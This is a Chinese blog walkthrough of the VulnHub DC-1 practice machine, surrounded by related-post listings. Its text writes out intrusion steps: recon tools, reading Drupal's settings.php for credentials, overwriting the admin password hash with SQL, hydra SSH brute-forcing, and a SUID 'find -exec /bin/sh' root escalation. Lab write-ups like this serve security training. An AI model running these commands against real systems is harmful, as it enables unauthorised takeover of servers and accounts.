vulnhub-DC1靶机

最新推荐文章于 2024-07-24 16:51:29 发布
最新推荐文章于 2024-07-24 16:51:29 发布
阅读量66 收藏 1
点赞数 1
分类专栏: DC 文章标签: linux 系统安全 web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63261741/article/details/132206979
版权

主机发现

arp-scan -l //或者netdiscover找到对应主机

在这arp里插入图片描述

nmap

在这里插入图片描述

80端口

在这里插入图片描述

whatweb

在这里插入图片描述

robots.txt

在这里插入图片描述

dirsearch目录扫描

在这里插入图片描述
在这里插入图片描述

msf或者searchsploit或

https://www.exploit-db.com/
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

交互shell 拿到flag1

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

提示查看CMS配置文件(百度搜索路径)拿flag2

cat /var/www/sites/default/settings.php

在这里插入图片描述
在这里插入图片描述

获取mysql账号密码 登录后查表

在这里插入图片描述
在这里插入图片描述
密码加密,找到加密脚本
在这里插入图片描述
利用PHP+加密脚本+密码(用加密后的密码替换已存在用户的密码)

php /var/www/scripts/password-hash.sh 123456

在这里插入图片描述

update users set pass='$S$DQ7XxSb7EkVStR52Y0e4KNok54.i1lt0oJXBMfFGD/VU1iZ0nKWZ' where name="admin";

登录成功 拿到flag3

在这里插入图片描述
在这里插入图片描述

根据提示需要提权

在这里插入图片描述

hydra爆破ssh

在这里插入图片描述

登录后拿flag4

在这里插入图片描述

## suid提取 拿最后一个flag

find / -perm -u=s -type f 2>/dev/null
find /etc/passwd -exec whoami \;
find /etc/passwd -exec "/bin/sh" \;

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

qwe@123
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulnhub靶机DC1
weixin_52450702的博客
10-29 934
靶机DC1IP:192.168.70.160。
vulnhubDC1靶机
LainWith的博客
08-15 1235
靶机概览信息收集nmap信息收集网站信息收集使用nikto来收集一下渗透攻击查找漏洞 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC1的MAC,这样做主机发现时可以通过MAC来过滤靶机。 nmap信息收集 1:使用nma.
Vulnhub-DC1靶机渗透
devil8123665的博客
07-21 244
Vulnhub-DC1靶机渗透 https://blog.csdn.net/adminuil/article/details/101269264
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1483
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
VulnHub DC1靶机渗透测试
weixin_44614631的博客
08-25 921
VulnHub DC1靶机进行渗透测试。最终,得到了四个flag和一个thefinalflag,共5个flag。有两个问题不是特别清楚,需要再进一步学习。 根据网络上两篇博文学习,总结。如果有版权问题,请联系我进行修改或删除...
VulnHub----DC1靶场记录
x1871329637的博客
04-26 3209
00-环境介绍 靶机下载地址:DC: 1 ~ VulnHub 攻击机:kali2022:192.168.200.129 DC1:192.168.200.135 目标:拿到5个flag 1由于这是一次黑盒测试所以只能根据目标mac地址来确认靶机的ip信息 由此判定靶机ip为192.168.200.135 2nmap直接扫 nmap -A 192.168.200.135 -p 1-65535 由此可见开放了22 80 111 42892端口,可以先去访问一下80端口 .
Vulnhub - DC-1
qq_46081990的博客
03-14 374
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
vulnhub:DC1靶机
qq_63283137的博客
09-12 293
执行完成,获得了meterpreter(Meterpreter是Metasploit框架中的一个扩展模块,是返回给我们的一个控制通道,用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接,功能强大:可以提权、打开shell、显示密码,显示主机信息、截屏、上传下载、隐藏、躲避系统的扫描等)根据第一个flag提示去寻找cms的cinfig file 并且Drupal的默认配置文件为 /var/www/sites/default/settings.php,查看一下发现flag2。
看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Aluxian_的博客
03-22 7498
Vulnhub靶机DC1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/dc-1,292/ Vulnhub靶机安装: 下载好了把安装包
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
Romax学习资料-DC1模块-载荷谱处理
03-14
### Romax学习资料-DC1模块-载荷谱处理 #### 一、直方图法 ##### 1.1 简介 在Romax软件的DC1模块中,直方图法是一种常用的载荷谱处理方法。这种方法主要用于对原始数据进行统计分析,并通过构建直方图来获取不同...
docker-compose version 1.23.0,build c8524dc1
09-01
centos7安装docker后,并没有安装docker-compose,而且很多源里没有,无法通过yum安装,wget github的源码,有时候会很慢,这里提供一个现成的,源码编译好的docker-compose。centos7安装docker和docker-compose,...
ST_DC1-configs:DC1子卡的Machinekit配置文件(对于DE10-Nano)
02-21
ST_DC1-配置 DC1子卡的机器套件配置文件(对于DE10-Nano) 用于ShadeTechnik DC1子卡的DE10-Nano硬件测试和设置的Machinekit Hal和GUI文件。 仍在进行中,可能会进行修订。
Linux:基础命令学习
qq_55038440的博客
07-20 1512
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
LINUX之MMC子系统分析
gy794627991的博客
07-23 1102
MMC子系统从协议到源码分析
RockyLinux 9 PXE Server bios+uefi 自动化部署 RockLinux 8 9
极致,细节
07-24 115
PXE(Preboot eXecution Environment,预启动执行环境)是一种网络启动协议,允许计算机通过网络启动而不是使用本地硬盘。PXE服务器是实现这一功能的服务器,它提供了启动镜像和引导加载程序,使得客户端计算机可以通过网络启动并安装操作系统或运行其他软件。
(leetcode学习)110. 平衡二叉树
最新发布
m0_54888411的博客
07-24 379
很久没写结构体了,复习一下。学习二叉树的通用解题方法。给定一个二叉树,判断它是否是。
python实现ECC算法编写以下题目:参数选取p=11,椭圆曲线为y^2=x^3+v+6,Ep(1,6)的一个生成元为G=(2,7)私钥d=7,用户A的公钥P=dG=(7,2)明文M=(9,1),加密:明文M=(9,1),用户B随机选取数k=6,由c1=kG,c2=M+k*PA得到密文为c3,解密:c2-dc1=(9,1)给出完整代码和结果
06-03
代码如下: ```python p = 11 v = 6 a = 1 b = 6 d = 7 k = 6 G = (2, 7) M = (9, 1) ... lam = ((b[1]-a[1]) * pow(b[0]-a[0], p-2, p)) % p ...注:此代码仅供参考,实际应用中还需要进行一些安全性考虑,如选择更大的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值